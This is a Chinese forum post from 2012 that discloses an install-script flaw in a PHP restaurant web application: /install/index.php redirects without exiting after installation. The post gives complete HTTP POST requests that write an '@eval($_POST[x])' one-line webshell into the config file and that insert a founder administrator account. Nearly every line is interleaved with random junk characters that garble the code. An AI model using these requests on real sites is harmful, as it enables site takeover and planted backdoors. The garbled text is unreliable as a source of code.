问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
g3 G. d6 V6 T$ w# G
! f$ Y, L' v" z+ Q<?php& `& N- l. _% ]# _/ o) o- [
if(file_exists("../install.lock"))
, \5 `6 R/ v" P" A; g9 h% V7 c( n2 ^{
6 @ w& y2 _( Z4 g$ L4 O header("Location: ../");//没有退出
% [, e2 h6 f. c( w: V1 W" L" Z. p}3 n' V9 z; Y4 a. T2 x5 x7 o
' L! e7 g0 h5 i- P. Y//echo 'tst';exit;
0 H" ^, M; c4 R9 [: b Drequire_once("init.php");
4 K8 ^9 l# y8 u% s1 W$ P Bif(empty($_REQUEST['step']) || $_REQUEST['step']==1)- P# d; {5 I' B2 E" [5 M
{
5 o8 P. W, y( J2 i# F. U+ L可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
7 v$ ^ f! P$ \* I
% a3 F' ^7 V# Y T7 q1 |, I& [6 J' s1、getshell(很危险)
2 ^: x5 ^# U* |if(empty($_REQUEST['step']) || $_REQUEST['step']==1)3 B& k# e( I8 ?. j+ u5 Z, l
{
) E5 g% |) N0 z2 k6 T. q$smarty->assign("step",1);
7 h" o% C1 j) X( N0 D3 E2 X) |$smarty->display("index.html");- g; m* {/ v O+ K. Q# r
}elseif($_REQUEST['step']==2)
) n4 a& a* I& }" `{ X) |. z3 `6 N
$mysql_host=trim($_POST['mysql_host']);
$ L6 V+ e9 p; Y+ }) u( l' H2 l $mysql_user=trim($_POST['mysql_user']);; V; Y4 K+ I5 w7 ?3 k( a
$mysql_pwd=trim($_POST['mysql_pwd']);3 U4 O7 W6 X5 h% Z1 F
$mysql_db=trim($_POST['mysql_db']);! U2 I& l8 {/ ~& r4 {
$tblpre=trim($_POST['tblpre']);
; `% X& b3 n; i $domain==trim($_POST['domain']);
j7 ]; a7 T R, A6 | $str="<?php \r\n";4 {. v+ Q- I" x6 q+ ^& D X8 a* S
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
1 Q V8 |: S g/ n, E% e( p! ] $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
, }; G8 P# F6 r& q; o $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";& w' {7 n) J* T' B$ C9 l
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";7 m; G4 o; D, i$ B$ S/ S! M1 G `
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";# k1 {' \3 O9 ` E6 D Y
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
8 D, U1 j2 I! b8 s, \! w $str.='define("DOMAIN","'.$domain.'");'."\r\n";% f1 \- ~. |: W3 C7 y0 V
$str.='define("SKINS","default");'."\r\n";
) ]$ f0 q; }' D3 T $str.='?>';! D3 o: Z! }9 d. e; ]# f4 U
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
. l( ] U; @% f2 w上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马" t' D3 u# z- n& Q o! H4 l; z
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
0 I. R+ Y: f3 v. |7 kHost: 192.168.80.129
; j2 Q$ R9 N; [" i; f8 sUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
& l* T4 E. }) rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
3 }* o% }$ [3 f3 ^1 ?, LAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.30 ~; O: w6 H, @6 J& C& R& H6 U" a3 S* F
Accept-Encoding: gzip, deflate
; g% {% w# g+ VReferer: http://192.168.80.129/canting/install/index.php?step=1
- C4 v' U3 X, [9 C& G: j }& u2 P$ PCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc424 N' e; j6 H2 n8 g) ^
Content-Type: application/x-www-form-urlencoded
2 `0 H7 V9 \- p# d+ X: s1 yContent-Length: 126
! ^, l3 ?2 Q$ ]9 K" g+ J* {9 O% n! V ( C: a! E6 Q/ H
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD- k7 R& z. K3 U g0 @
但是这个方法很危险,将导致网站无法运行。$ B( T1 V$ \; g
% M7 z, X3 m+ V5 |" c
2、直接添加管理员' @, ^# D) O5 a: b9 H ~
( N6 d0 H9 ]8 G
elseif($_REQUEST['step']==5)
" U% p# K; e& A% n( Q{
$ `' e' j: @% W6 `/ [/ E6 p/ }; V; u if($_POST)7 G, f& V) ?5 l7 t: U w$ Y) E
{ require_once("../config/config.inc.php");8 ?5 B' b5 L2 \* q. B0 t7 P
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);2 O6 _; p8 z8 c
mysql_select_db(MYSQL_DB,$link);
; _9 X W8 T' T2 r& w* |* Z mysql_query("SET NAMES ".MYSQL_CHARSET );0 T7 ^4 s3 z3 Z
mysql_query("SET sql_mode=''");
9 _ q: g. b/ x. a* U% I# L. e/ g( `( i2 [
$adminname=trim($_POST['adminname']);% m9 \( M% S3 d. x) w# e/ I* {
$pwd1=trim($_POST['pwd1']);% I6 C, B' V, E5 t; A
$pwd2=trim($_POST['pwd2']);8 h6 X4 N9 Y2 Y( w0 M' s* U
if(empty($adminname))# K2 Y, i# F5 d& G
{- D! `% V( b+ O2 g4 s/ X* N& ?
3 a0 v8 R7 f* u' t
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
" ~1 T/ r1 y# ^9 z/ X exit();( Q. o9 R, d. Z- O# J: U/ F$ Y; {8 D
}# r$ p6 f. `1 h( x7 l3 v4 ?' p3 [
if(($pwd1!=$pwd2) or empty($pwd1))
3 R$ p& e& I# E- g( ?1 y {
( j, e" J& z! Z$ |+ u, a; O echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出! u% B4 C7 \' b4 D4 F
} J- S8 o% z% X* K. l: L' Y
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员0 I6 N1 r, {% Q" t; T
}
- G& P3 U: h1 R( w j) s这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
5 V5 `. | @4 d. s" QPOST /canting/install/index.php?m=index&step=5 HTTP/1.1- f3 D6 P- v0 {0 I
Host: 192.168.80.129
/ W1 [- ~. I6 C" @+ N7 rUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0! N4 q8 o3 b: J+ E* l# \ l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
% F" k, q* I) W# T2 dAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3) E& F: }( n' c. S( \! l
Accept-Encoding: gzip, deflate8 ^% r8 r l/ V' V
Referer: http://www.2cto.com /canting/install/index.php?step=15 k0 x, Z2 M$ V
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42! m: E# ?; a1 p9 z; f; j
Content-Type: application/x-www-form-urlencoded4 S( R' m+ z; e1 A8 L$ ]( q
Content-Length: 46% z% P9 E, q \, m2 k( O+ u& D8 _4 N$ a
/ N8 d2 }* v" aadminname=qingshen&pwd1=qingshen&pwd2=qingshen/ |, u: U- F6 ?! M6 Y4 i; P* L
|
发表于 2012-12-4 11:13:44
收藏
支持
反对